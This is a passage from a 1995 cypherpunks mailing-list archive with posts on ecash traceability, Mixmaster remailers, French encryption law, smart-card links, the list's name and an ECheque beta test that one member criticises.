both legal. See a flaw in that? Try that in France might be more interesting, where it really is illegal to import crypto. It's kind of theoretical, but an interesting argument... what happens when this happens with porn, is perhaps a more tricky question, re possible illegality of import from outside US, maybe in such cases you should request the viewer to turn off autoload of images, so that they must request them after reading the disclaimer text. Or perhaps it would be necessary to ensure that it never happens automatically without the user clicking on a button certifying that they are not in the US, the antithesis of MIT's I affirm I am a US citizen blah, blah, that goes with getting PGP from their site (I didn't get it btw, I just read the questions for my amusement). Adam From pfarrell at netcom.com Fri Sep 15 05:03:32 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Fri, 15 Sep 95 05:03:32 PDT Subject: Why ecash is traceable Message-ID: <28922.pfarrell@netcom.com> tcmay at got.net (Timothy C. May) writes: > Hal, a very nice summary! Yes, good job Hal. > Why not "online clearing" as the preferred model, then? Because you lose most (all?) anonymous abilities. (I think) > (There are more abstract ways of viewing this advantage. While mere > software is always duplicable, and cash numbers are of course duplicable, > one thing that is not duplicable is this: "the first agent to present a > valid number at this bank." There can be only one of these, and this > uniqueness is what keeps the currency from collapsing, what introduces > _conservation_ into the system.) > > Well, since Alice knows her own blinding factors, she will always be able > to say to the bank: "My cash will look like this. Watch for it." So when the money Alice gave to Bob gets deposited by TCMay, That it was Alice's is instantly known. This is not how physical cash works. There is a chain from TCMay through some number of steps to Bob. Even if you can't find it with this single case, you could use a zero-knowledge type proof to slowly uncover Bob's identity. I keep wanting to believe in ecash, but I'm not convinced it can exist. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From jya at pipeline.com Fri Sep 15 05:23:33 1995 From: jya at pipeline.com (John Young) Date: Fri, 15 Sep 95 05:23:33 PDT Subject: VIO_lat Message-ID: <199509151223.IAA22176@pipe4.nyc.pipeline.com> 9-15-95. NYPaper: "Company Says Electronic Mail Was Opened to Find Pornography." America Online gave the FBI access to the mailboxes of its subscribers to identify several thousand users who viewed images of children in sexual poses and to trace messages beyond AOL to many more computer users nationwide. Because electronic mail has a life of days or weeks, can be traced and can be easily copied without alerting the owner, reading the mailboxes was particularly effective. It was unclear how much information about subscribers is routinely kept and how much private information was provided to the FBI. Actions of users can be recorded and can reveal much more personal information than the records a telephone company. "F.B.I. Chemist Says Experts Are Pressured To Skew Tests." Officials at the F.B.I. crime laboratory have been accused by one of its chemists, Frederic Whitehurst, of pressuring forensic experts to commit perjury to help secure criminal convictions. With opinion polls showing public support for the F.B.I. eroding after Congressional hearings into the Branch Davidian siege, the accusations regarding the laboratory are in some ways the worst blow yet. Two: VIO_lat (11 kb) From kelso at netcom.com Fri Sep 15 05:23:39 1995 From: kelso at netcom.com (Tom Rollins) Date: Fri, 15 Sep 95 05:23:39 PDT Subject: Why ecash is traceable In-Reply-To: <28922.pfarrell@netcom.com> Message-ID: <199509151220.FAA00243@netcom4.netcom.com> Pat Farrell says: > Because you lose most (all?) anonymous abilities. (I think) > So when the money Alice gave to Bob gets deposited by TCMay, > That it was Alice's is instantly known. This is not how physical cash works. > > There is a chain from TCMay through some number of steps to Bob. > Even if you can't find it with this single case, you could use > a zero-knowledge type proof to slowly uncover Bob's identity. > > I keep wanting to believe in ecash, but I'm not convinced > it can exist. Just a little humor... Perhaps Electronic Cash has a sound. Phone Phreakers have something called a Redbox. This device makes the sound of a quarter. When an ATT pay phone asks you to deposit $1.75 you just make the sound of 7 quarters... :) From nelson at crynwr.com Fri Sep 15 05:59:09 1995 From: nelson at crynwr.com (Russell Nelson) Date: Fri, 15 Sep 95 05:59:09 PDT Subject: Mixmaster status In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Date: Fri, 15 Sep 1995 01:03:58 -0700 From: loki at obscura.com (Lance Cottrell) Let me be crystal clear. 1) I will not support any version of Mixmaster that is weakened. 2) All future clients will be able to generate the current message format. 3) All future servers will be able to read the current message format. 4) There will always be a free version of the client with source code. And also that Mixmaster(tm) is a trademark of Lance Cottrell, and as long as he owns it, he controls the use of it. If you trust Lance, you can trust the name Mixmaster(tm). While I have not discussed it, I can not imagine that there would not also be a free version of the server code (with source). Without remailers what is the point of the client software? I'm confused here. Isn't every copy of mixmaster potentially a client and/or server? That seems to me to be one of the beautiful aspects of mixmaster -- run a remailer and you greatly increase your own privacy. -----BEGIN PGP SIGNATURE----- Version: 2.7 Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface iQCVAwUBMFl4eabBSWSDlCdBAQFkOgP+KN3YYk6Wvq7T4V+uihg6u8NVY3iRobMJ LFOrpm5LrG/WGMfpUouUt4/XfItWrEkRobgFLZaZ407tMkdG0tOUXSixmohdzXS9 AzEB6+Rj+KHqKjRiM2YTdUGLxLF2oQLoN05g2Trj3/V1XQrHwLU7zj/H6nJlrz1M FP6A5KCc+EU= =lzQY -----END PGP SIGNATURE----- -- -russ http://www.crynwr.com/~nelson Crynwr Software | Crynwr Software sells packet driver support | PGP ok 11 Grant St. | +1 315 268 1925 (9201 FAX) | America neither a Christian, Potsdam, NY 13676 | Jewish, Islamic, nor atheist (etc&) nation. This is good. From anonymous at freezone.remailer Fri Sep 15 06:08:25 1995 From: anonymous at freezone.remailer (anonymous at freezone.remailer) Date: Fri, 15 Sep 95 06:08:25 PDT Subject: Chiffrement en Fr Message-ID: <199509151308.JAA21250@light.lightlink.com> A web search for Quisquater led to: URL: http://www.cnam.fr/Network/Crypto/ which offers, among other belle chiffre-escrits: L'UTILISATION DU CHIFFREMENT EN FRANCE Le chiffrement est la technique qui consiste � modifier un fichier de fa�on � le rendre illisible par les personnes auxquelles il n'est pas destin�. Pendant longtemps l'apanage des militaires, il est maintenant un outil indispensable � l'�re des r�seaux pour ceux qui veulent prot�ger la confidentialit� de leurs messages. Son utilisation soul�ve diverses questions. Si cette page Web est l'une des premi�res en France, il en existe de nombreuses aux Etats-Unis . Je ne parlerai pas beaucoup de technique sur cette page. Si vous voulez en savoir plus, regardez : * L'excellent serveur du Groupe de Recherche en Complexit� et Cryptographie, * Quelques modestes explications. Le chiffrement est pratiquement interdit en France par la loi 90-1170 du 29 d�cembre 1990 (avec d�cret d'application en d�cembre 1992). Une excellente petite brochure (avec un sphinx sur la couverture :-) de la D�l�gation Interminist�rielle pour la S�curit� des Syst�mes d'Information (DISSI) explique cette loi (mais malheureusement ne d�taille pas ses conditions r�elles d'application). Elle est envoy�e gratuitement sur simple demande : DISSI 3 avenue Octave Gr�ard 75007 PARIS C'est le Service Central de la Securite des Systemes d'Information (SCSSI) qui doit etre contact� pour plus d'information et d�p�t des demandes d'autorisation. Il existe deux cas : 1. Soit vous utilisez le chiffrement � seule fin d'authentification (chiffrement de mots de passe pour qu'ils ne circulent pas en clair sur le r�seau, par exemple) : il faut faire une d�claration au SCSSI qui est ensuite v�rifi�e. 2. Soit vous l'utilisez pour la confidentialit�. Il faut alors demander une autorisation au SCSSI. SCSSI 18, rue du Docteur Zamenhof 92131 ISSY-LES-MOULINEAUX Cedex T�l. : (1) 40 95 37 15 Fax. : (1) 40 95 37 01 Dans les deux cas, la demande aura pu �tre faite par le r�alisateur ou le vendeur du logiciel. Plus de d�tails sont donn�s dans la pr�sentation de Bruno Malhey (�galement en PostScript). J'y ajoute que les crit�res d'acceptation ou de refus ne sont pas publics. Il semble que l'autorisation ne soit donn�e qu'aux institutions "s�rieuses" (banques, ...) et � condition de ne pas utiliser de logiciels trop efficaces. En effet, il s'agit de conserver la possibilit� pour la police de suivre les �changes. On notera que la plupart des pays comparables � la France autorisent le chiffrement, comme le montre l' excellente enqu�te de Sylvain Andr� (vous pouvez voir aussi l'�tude du gouvernement am�ricain). Le logiciel de chiffrement le plus connu est PGP (Pretty Good Privacy). Gratuit, assez simple � utiliser, tr�s efficace, bien document�, tournant sur de nombreuses plate-formes (Unix, MS-DOS, Macintosh), c'est un excellent outil pour l'utilisateur. Il semble que son autorisation en France soit hors de question. Notez que, si vous voulez utiliser PGP en France, vous avez deux obstacles successifs : 1. PGP est interdit d'exportation par les Etats-Unis. Il faut donc r�cup�rer une des (nombreuses) versions sur un serveur non-am�ricain. 2. Le chiffrement est soumis � autorisation en France. Voir ci-dessus. Certaines personnes trouvent qu'un autre obstacle � l'utilisation de PGP est la difficult� d'utilisation. Celles-ci peuvent lire le remarquable livre de Garfinkel : Simson Garfinkel PGP ; Pretty Good Privacy O'Reilly & associates ISBN 1-56592-098-8 Et il existe d'autres pr�sentations de PGP comme celle d'Ollivier Robert (fichiers PostScript PGP.*.ps), qui existe aussi sous forme d'un serveur Web. PGP prot�ge des fichiers, soit lors de leur transmission sur le r�seau (par courrier �lectronique ou autre m�thode), soit en local. D'autres logiciels prot�gent, par exemple les connexions � distance ou le syst�me de fen�trage X ( SSH assure ces deux fonctions). Visitez le service Web "International Cryptography Pages" pour avoir tous les renseignements possibles, notamment sur les logiciels disponibles en dehors des Etats-Unis. Enfin, apr�s ces informations purement factuelles, voil� mon opinion. Voir aussi * L'Electronic Frontier Foundation qui lutte pour les droits du citoyen dans le monde informatis� dispose de nombreuses informations sur le chiffrement. * Computer Professionnals for Social Responsability travaille �galement sur le respect de la vie priv�e. * Toujours en fran�ais, mais con�ernant plus sp�cifiquement le Qu�bec. Page faite par St�phane Bortzmeyer sur le serveur du CNAM. Derni�re mise � jour le 4 ao�t 1995. From anonymous at freezone.remailer Fri Sep 15 06:14:54 1995 From: anonymous at freezone.remailer (anonymous at freezone.remailer) Date: Fri, 15 Sep 95 06:14:54 PDT Subject: Smart Cards, Credit cards, Payment systems Message-ID: <199509151314.JAA21423@light.lightlink.com> URL: http://www.dice.ucl.ac.be/~dhem/card.html Smart Cards, Credit cards, Payment systems. This page is under development. _________________________________________________________________ Card Europe DigiCash MasterCard Futur 1 , 2 Virtual Open Network Environment (V-ONE) MONDEX AT&T and GiroVend agree to promote smart card applications AT&T Universal Card Services ATT buyinfo ibd.ar.com/lists/comp/cypherpunks Discussions, mailing lists, and sites , Payment mechanisms designed for the Internet News items on information technology (Not especially Smart Cards) Electronic Cash, Tokens and Payments in the National Information Infrastructure Forum On Risks To The Public In Computers And Related Systems (ACM) The Risks Digest Volume 4: Issue 32 The Risks Digest Volume 15 The Risks Digest Volume 16 SMI Finger Check -- Fingerprint Verifier DIGITAL SRC Research Reports Authentication and Delegation with Smart-cards Innovonics QC consultancy University of Wollongong: Centre for Computer Security Research SecureWare, Inc. OKI Telecom (Smart) Cards Museum (big) Buying Prepaid Calling Card S. Brands Cyberbank '95 Electronic benefits transfer (EBT) in US NCSA/DTIC Security Seminar Power Broker First Union Corp. will offer stored-payment ''smart cards'' Network Payment Mechanisms and Digital Cash PCMCIA Cards THE PREPAID & RECHARGEABLE PHONE CARD Cardservice International _________________________________________________________________ UCL crypto group _________________________________________________________________ Last update: 11 September 1995. Send any comment to: Dhem at dice.ucl.ac.be (J.-F. Dhem) From anonymous at freezone.remailer Fri Sep 15 06:53:09 1995 From: anonymous at freezone.remailer (anonymous at freezone.remailer) Date: Fri, 15 Sep 95 06:53:09 PDT Subject: Loi Log Message-ID: <199509151352.JAA23300@light.lightlink.com> There was an uncharacteristically long delay (2+ hours) in receiving documents from the site, including those linked to non-fr sites. Not sure if it is due to self-applied site restrictions or the other loi-logging. From kelli at zeus.towson.edu Fri Sep 15 06:59:18 1995 From: kelli at zeus.towson.edu (K. M. Ellis) Date: Fri, 15 Sep 95 06:59:18 PDT Subject: CYPHERPUNK considered harmful. In-Reply-To: Message-ID: On Wed, 13 Sep 1995, Timothy C. May wrote: > > > > We too often think of ourselves as an elite - smarter and better in > >various ways to our non-cpunk neighbours. We refer to these others as > >'Joe Sixpack" and other such derogatary terms. > > > > The problem is that in doing so we are marginalizing ourselves. > > > > We call ourselves 'cypherpunks'. While this is derived from the SF > >term 'cyberpunk', consider the image we are creating for ourselves: > > > > A 'punk' is a marginalized young adult, one who rejects the norms > >of his or her society, and takes delight in irking those around him with > >his or her rejection. The older of us will think of James Dean in 'Rebel > >Without a Cause', or Brando in 'The Wild One'. Later, you get images > >such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and > >other icons of the 'punk rock' movement. > > While I have had some qualms about the name, on balance I think it has been > good for us. After all, it's not as if _other_ groups don't already exist! > In particular, the British branch of Cypherpunks disliked the name > "Cypherpunks" so much that they used a different name for themselves, the > "U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for > whatever reasons. But the name may have been a factor, at least. I agree with Peter's point... some of the core cypherpunks (I'll not mention names) can be somewhat elitist, whether they mean to or not. Not that they don't have some reason to be...as Pat Farrell once told me the cypherpunks mailing list is, to some degree, an IQ filter. Many cypherpunks have a firm reason for some self-indulgent pride. However, our goal (or, at any rate, _a_ goal) is to make crypto use ubiquitous, and for this we must deal with the public at large in a, perhaps, more diplomatic and user-friendly manner. 8> > We fill a certain niche which is useful to have filled, a more radical > facet of things. If we didn't exist, or renamed ourselves "Concerned > Citizens for Cryptographic Protection," CCCP, then somebody would have to > _invent_ the Cypherpunks! > True, but if the majority of active participants see an alternative agreeable to them, they may just switch and start calling themselves something else. If the list owner likes it and changes the name of the list, then what of the cypherpunks unwilling to change? It would appear, then, that they would be the ones who would have to find somewhere else to go. > - We are actually not very "punkish" at all. About as punkish > as most of our cyberpunk cousins are, which is to say, not > very. Anybody who reads the mailing list or the cyphernomicon knows this, but anyone hearing the name for the first time does not get this impression. > > Getting back to your suggestion that "we" change the name to something more > respectable. How could "we" do this, given that "we" are an effective > anarchy? > > I can't imagine a vote on this, and the endless debates on what "we" ought > to call ourselves would be a waste of time. Better than a vote (and more effective in western culture, where only 39% of the population votes anyway but just tends to go with the flow) is to propose an alternative, flat out, adopt it for yourself, and whoever prefers it will follow your lead. If nobody likes it, then the cypherpunks are simply here to stay. > > Fortunately, there's an elegant solution: form your own group. > > Form your own group, your own mailing list, with a catchy name, something > like "The Privacy Education Foundation," or "The American Civil Liberties > Union" (whoops, taken), or "The Society for the Preservation of > Cyberspatial Liberty." > > Then announce it on our list, and elsewhere. People will vote with their > feet. If your "meme" is catching, your list will rapidly gain members. > Maybe this Cypherpunks list will even atrophy away. > > Evolution in action. The market in action. A better approach than trying to > get the name and the charter changed. > My point is that you may not have to do all this. This is a recurring thread on the list. . . if enough people feel the same way you do you could have the human resources effective for a cypherpunks "take-over". As for myself, I don't think I would change. . . I actually _am_ a "long-haired wierdo". I think a slightly more conservatively named organization similar to the cypherpunks would be a good thing, however, simply because I like the idea of having something more low-key to compare c-punks with, sort of like the IRA to Sinn Fein. I'm just offering some humble advice, knowing full well that I am for the most part an unknown lurker without much reputational weight to throw around. It's also part of a leadership dynamic that is, I feel, underused. (Furthermore, if it works, I could use it as a paper topic for my social psychology class ;). ) Sincerely, -=Kathleen M. Ellis=- If you can come, don't forget that the DC Cypherpunks are having a meet on Saturday at 3pm at Digital Express in Beltsville, MD..email me for directions or info on our mailing list. kelli at zeus.towson.edu Geek Code v3.0 http://zeus.towson.edu/~kelli/ GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- y+>+(-) PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z** Diverse Sexual Orientation Coll.Towson State University DSOC at zeus.towson.edu "All the world will be your enemy, Prince With The Thousand Enemies. . . And whenever they catch you, they will kill you. But first, they must catch you. . ." -Richard Adams From bugs at ritz.mordor.com Fri Sep 15 07:02:47 1995 From: bugs at ritz.mordor.com (Mark Hittinger) Date: Fri, 15 Sep 95 07:02:47 PDT Subject: Oct Byte - Wayner's article heh Message-ID: <199509151402.KAA10522@ritz.mordor.com> Check it out From hfarkas at ims.advantis.com Fri Sep 15 07:35:57 1995 From: hfarkas at ims.advantis.com (Henry W. Farkas) Date: Fri, 15 Sep 95 07:35:57 PDT Subject: Why ecash is traceable In-Reply-To: <199509151220.FAA00243@netcom4.netcom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 15 Sep 1995, Tom Rollins wrote: > Just a little humor... > Perhaps Electronic Cash has a sound. > Phone Phreakers have something called a Redbox. > This device makes the sound of a quarter. > When an ATT pay phone asks you to deposit $1.75 > you just make the sound of 7 quarters... :) New Zen koan? What is the sound of 7 quarters *not* being deposited? =========================================================================== Henry W. Farkas | Me? Speak for IBM? Fat chance. hfarkas at ims.advantis.com |------------------------------------------------ hfarkas at vnet.ibm.com | http://newstand.ims.advantis.com/henry henry at nhcc.com | http://www.nhcc.com/~henry - --------------------------------------------------------------------------- PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52 B3 80 34 1C CE 38 EC 53 Public key at: pgp-public-keys at pgp.mit.edu, and other popular key servers. - --------------------------------------------------------------------------- Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not fast, but it's not bad, and we're cheaper than the guy down the street!" =========================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta iQCVAwUBMFmPJKDthkLkvrK9AQEPdgP/S7OTS7EjSSNiwFgFPFdgs+gymPKVgUaT 5iuSEXGxHJDSzdZocuA7NoT4OUvpYriC7Lkk3uaSQ5kNPX/2veXzEowh1+nFfDmq 8Lgay1MpanwOlZC3F/VrBJP6m2eZtUdhN+qejccqyU0EiQZN1idUkpFCel9D6lu+ TYmkRLVGDOc= =KjF7 -----END PGP SIGNATURE----- From hfinney at shell.portal.com Fri Sep 15 07:49:44 1995 From: hfinney at shell.portal.com (Hal) Date: Fri, 15 Sep 95 07:49:44 PDT Subject: Why ecash is traceable Message-ID: <199509151448.HAA21190@jobe.shell.portal.com> Sorry, I don't have time to write much now. The missing piece in my description was the assumption that people would have to send received cash to the bank non-anonymously. However as Tim points out that can be avoided in on line systems, and in that case Alice cannot actually learn Bob's identity. However as was also pointed out the cash can at least be detected and invalidated so technically it is still traceable. The protection of the payor is still not really as strong as that of the payee. I should also mention that when we discussed this earlier Jason Solinsky suggested that transferrable cash systems also provide a means for Bob to keep his identity secret. The cash is still traceable in that the bank can recognize it when it is finally deposited, but it may have passed through many people's hands in the meantime and their identities are not known. Hal From rsalz at osf.org Fri Sep 15 08:13:26 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 15 Sep 95 08:13:26 PDT Subject: Linking = Showing = Transferring? Message-ID: <9509151512.AA08301@sulphur.osf.org> > I think this case is safer than the porn one, because the actual data > in this case is legal in both jurisdictions, it just must not be > transferred from jurisdiction US -> jurisdiction non-US, which it has > not been. I believe you're right, this is the key distinction which I missed. (Disregard my earlier email to you :) Thanks for the patient explanation. /r$ From mfroomki at law.miami.edu Fri Sep 15 08:15:42 1995 From: mfroomki at law.miami.edu (Michael Froomkin) Date: Fri, 15 Sep 95 08:15:42 PDT Subject: DD, pedophiles, and Terrorists, oh my In-Reply-To: <199509150908.CAA22145@ix3.ix.netcom.com> Message-ID: FOIA doesn't work for stuff pertaining to ongoing LEA activity or cases pending in court. (simplified summary of complex rule) A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | mfroomki at umiami.ir.miami.edu U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid. Coral Gables, FL 33124 USA | See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki From JohnHemming at mkn.co.uk Fri Sep 15 08:23:21 1995 From: JohnHemming at mkn.co.uk (John Hemming CEO MarketNet) Date: Fri, 15 Sep 95 08:23:21 PDT Subject: More on ECheques Message-ID: Version 0.1 (beta) of WorkHorse has now been put on the ftp site together with instructions as to how to use it to pay for things with ECheques. You are welcome to test ECheques on our live floristry service. To do this: 1. Download WorkHorse ftp://193.119.26.70/mktnet/pub/horse.zip 2. Follow the instructions for generating a key. a) Generate Key System/security/key gen (please use 512 bits) b) Specify your user details Alter/my details (put in a bank a/c no) 3. Don't worry about registering the key (unless you really want the flowers and have a BankNet account) 4. Try http://alpha.mkn.co.uk/load ordflow .. or http://beta.mkn.co.uk/load ordflow .. or http://epsilon.mkn.co.uk/load ordflow 5. Don't fill in credit card details . Please put a name of Test or testing. Click the button for ECheque (or electronic cheque) 6. Send the form. If you can easily trace the conversation it will be interesting. The system will automatically go into SSL with 128 bit RC4. It will generate a signed instruction and transmit that in the secure session. If you want to see how the form works save the html source. You can set it up on another server and receive the signed instruction yourself if you want. You can use workhorse to check the signature. (The first live ECheque was issued on Wednesday). From clewton at netcom.com Fri Sep 15 08:36:32 1995 From: clewton at netcom.com (Charles Lewton) Date: Fri, 15 Sep 95 08:36:32 PDT Subject: Linking = Showing = Transferring? In-Reply-To: Message-ID: On Fri, 15 Sep 1995, Duncan Frissell wrote: > > On Thu, 14 Sep 1995, Lucky Green wrote: > > > The answer is trivial. If it pisses of the fascists in power enough, you > > go to jail or get killed. > > As a libertarian nut, I bow to no one in my love of extreme statements. > But I feel compelled to sqaush this particular notion whenever I see it. > Randy Weaver really pissed off the Feds and did not go to jail (except > during trial) and received a $3.1 million settlement. (.1 to him, 3 to > the kids but they are minors). > > DCF > Not quite squashed, Duncan. Bullet placement (poor by some standards) is all that prevented Mr. Weaver from croaking like his unfortunate wife. She is said to have "pissed off" the feds but was not charged with a single actionable item yet she remains quite dead. Unless I have missed somthing somewhere, no TLA is concerned in the slightest with individual liberty. That notion should keep a rational person awake nights. Chuck From fair at clock.org Fri Sep 15 09:04:16 1995 From: fair at clock.org (Erik E. Fair (Time Keeper)) Date: Fri, 15 Sep 95 09:04:16 PDT Subject: NSA on GAK Message-ID: At 16:25 9/14/95, Rich Salz wrote: >>> Internet runs on software distributed over the Internet. > >This is more like an aphorism than a true statement. Um, not really. I dunno about you, but I don't bother to get new ROMs from cisco for each new software release - I FTP the code over the net, and write it into flash RAM in the routers (or net boot it). So, in fact, there are many sites (and backbones) for which that statement is literally true. Erik Fair P.S. And yes, cisco does publish MD5 hashes of their binaries. From rsalz at osf.org Fri Sep 15 09:23:02 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 15 Sep 95 09:23:02 PDT Subject: NSA on GAK Message-ID: <9509151622.AA08762@sulphur.osf.org> Yeah, really. I didn't say it isn't true, I just said it's more like a cute quote than truth. Compare the number of bits downloaded in TCP/IP and routing infrastructure to the number of bits that are purchased at the store or via a P.O. Miniscule. r$ From tcmay at got.net Fri Sep 15 09:46:17 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 15 Sep 95 09:46:17 PDT Subject: Why ecash is traceable Message-ID: At 8:47 AM 9/15/95, Donald M. Kitchen wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >Excellent discussion on the subject, actually. However, your idea of >the "first person to the bank" maintaining anonymity via remailer block >is flawed. First of all, if a collusion with the bank is being taken into >account, presumably sufficient enough resources are involved that someone >may try and track the reply block. Mixmaster (as your messages mentioned >by name) would be necessary to eliminate the chance of tracking the block >through combinations of replay attacks etc. (Which reminds me, has anyone Just to clarify a minor point, I mentioned "mixes," not Mixmaster. I have nothing against Mixmaster, but "mix" is the term Chaum invented for what we later started to call a "remailer." --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From trei at process.com Fri Sep 15 09:57:16 1995 From: trei at process.com (Peter Trei) Date: Fri, 15 Sep 95 09:57:16 PDT Subject: More on ECheques Message-ID: <9509151657.AA12563@toad.com> > Version 0.1 (beta) of WorkHorse has now been put on the ftp site together > with instructions as to how to use it to pay for things with ECheques. > > You are welcome to test ECheques on our live floristry service. To > do this: > > 1. Download WorkHorse ftp://193.119.26.70/mktnet/pub/horse.zip > 2. Follow the instructions for generating a key. > a) Generate Key System/security/key gen (please use 512 bits) > b) Specify your user details Alter/my details (put in a bank a/c no) [...] If a random person called you on the phone, and asked for one of your bank account numbers, would you give it to him/her? Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From trei at process.com Fri Sep 15 10:04:38 1995 From: trei at process.com (Peter Trei) Date: Fri, 15 Sep 95 10:04:38 PDT Subject: More on ECheques (retry) Message-ID: <9509151704.AA12852@toad.com> Gah - it's easy to click on 'send' before you really mean to > You are welcome to test ECheques on our live floristry service. To > do this: > > 1. Download WorkHorse ftp://193.119.26.70/mktnet/pub/horse.zip > 2. Follow the instructions for generating a key. > a) Generate Key System/security/key gen (please use 512 bits) > b) Specify your user details Alter/my details (put in a bank a/c no) If you received a phone call from someone you did not know, who asked you for your bank account number, would you comply? If a stranger handed you a floppy and asked you to run the binary on it. while connected to the Internet, and give it your bank account number, would you do so? If email from an unknown person asked you to download a binary over the internet, and run it, giving it your bank account number, would you do it? That's exactly what is being asked here. Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From dsc at swcp.com Fri Sep 15 10:13:36 1995 From: dsc at swcp.com (Dar Scott) Date: Fri, 15 Sep 95 10:13:36 PDT Subject: Why ecash is traceable Message-ID: Timothy May wrote, >I don't think all systems must be able to deal with double spending. > >For example, the first person to read this number: 45%2)d[12ks&Qmdx and to >then submit it any form--in person, by e-mail, via remailer, etc.--to The >First Bank of Cyberspace will have $10 sent to him or her, as cash or as a >spendable amount of digicash (untraceable to recipient, of course). I would expect that services might emerge that would strengthen this without the bank getting involved and without loss of anonymity. It might emerge that because of the bank's lack of handling of double spending that in some transactions some payees would request a money order from a trustee. The payee might supply the list of money order suppliers allowed for that day. If the payee does not want the money order addressed with a public key, he can supply a set of alternate keys each encrypted for an acceptable trustee. The money order allows the payee to be as sure that the cash is good as he trusts the trustee (and the bank). With or without the use of a remailer this can add to hiding the payer. However, unless the payee provides a hidden key, the trustee does know who received some payment. The trustee is highly motivated to operate a memoryless system (except for the trustee's own cash) and might be audited to ensure this to both customers and potential physical raiders. The cash bundled in the money order need not be that returned from exchanging the money order payment. Some trustees might return a money order containing cash that has other properties, too. If the payee really trusts the trustee, then no race to exchange the cash is needed--hiding the payee further. The payee can exchange it over a period of time or as needed. Exchange includes indirect exchange as in buying money orders. I'm new to protocols and I mention details below only to add hopefully clarifying material, not to suggest that I have any idea of the right ways to do these things. These can be implemented using PGP. Money Order: The automated trustee checks the money (for money order amount and fee). If it is bad the trustee sends it back. Otherwise, the trustee exchanges the cash and then selects from cash on hand cash of the amount of the money order. This is encrypted for the payee. (The buyer must supply something the trustee would know how to use to encrypt for the payee: public key or message addressed to the trustee containing information on how to encrypt for the payee.) The money is encrypted with that. A description is added to this and it is signed by the trustee and sent back to the payer. The description may or may not mention the payee depending on whether the money was wraped with a public key or not. Escrowed Money Order: The trustee creates a money order that can be opened by either the payer or payee and encrypts that for the escrow agent. A description and signature is added. Generalization: Payees and escrow agents can be abstract recipients such as and/or lists. I wonder how much I could charge for this. Dar =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html =========================================================== From tcmay at got.net Fri Sep 15 10:30:47 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 15 Sep 95 10:30:47 PDT Subject: CYPHERPUNK considered harmful. Message-ID: At 1:58 PM 9/15/95, K. M. Ellis wrote: (quoting my response) >> We fill a certain niche which is useful to have filled, a more radical >> facet of things. If we didn't exist, or renamed ourselves "Concerned >> Citizens for Cryptographic Protection," CCCP, then somebody would have to >> _invent_ the Cypherpunks! >> > >True, but if the majority of active participants see an alternative >agreeable to them, they may just switch and start calling themselves >something else. If the list owner likes it and changes the name of the >list, then what of the cypherpunks unwilling to change? It would appear, >then, that they would be the ones who would have to find somewhere else >to go. Indeed, if a majority of folks on this list start calling themselves "Martians" or "Crypto Tools," then I suppose this list will _gradually_ adopt that name. Though even then there are no guarantees, as this list is run on a machine not controlled by a list democracy. Go for it! If you wish the folks on this list to call themselves "Concerned Citizens for Cryptographic Freedom," then start calling yourself that. What I think would be a waste of everyone's time is a drawn-out series of proposals for new names, a debate which is unlikely in the extreme to result in a new name. >Better than a vote (and more effective in western culture, where only 39% >of the population votes anyway but just tends to go with the flow) is to >propose an alternative, flat out, adopt it for yourself, and whoever >prefers it will follow your lead. If nobody likes it, then the >cypherpunks are simply here to stay. Indeed, some people here have been calling themselves by various names ("CypherGeek," "Crypto Rebel," etc.) for a long time. Personally, I despise the terms "geek," "dweeb," and "nerd," and think anyone who calls themselves by these insults is not "reclaiming and deconstructing the labels of the oppressor class," as the slogan goes, but is merely insulting themselves. Blacks who call themselves "niggers," homosexuals who call themselves "queers," and computer programmers who call themselves "geeks" and "dorks" are all playing the same game. >"long-haired wierdo". I think a slightly more conservatively named >organization similar to the cypherpunks would be a good thing, however, >simply because I like the idea of having something more low-key to compare >c-punks with, sort of like the IRA to Sinn Fein. I'm just offering some >humble advice, knowing full well that I am for the most part an unknown >lurker without much reputational weight to throw around. It's also part >of a leadership dynamic that is, I feel, underused. (Furthermore, if it >works, I could use it as a paper topic for my social psychology class ;). ) The problem is not a "leadership dynamic," the problem is that name changes are not easily arranged. With 700 people on this list, many of whom appear to _like_ the name, how long will it take before enough want to change to make it so? And who says democracy is such a good thing? What if 200 want to change, 100 don't, and the rest don't care or don't "vote"? A better approach is for the "conservatives" who want a "more conservative" name to simply do what I suggested: form a new group and name it what they like. They wouldn't have to quit this list, they would just be able to cleanly recruit for their new list. Seems simple to me. And honest. And less devisive than trying to change the name of a group with a long history (by modern standards) and with several well-known achievements. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, 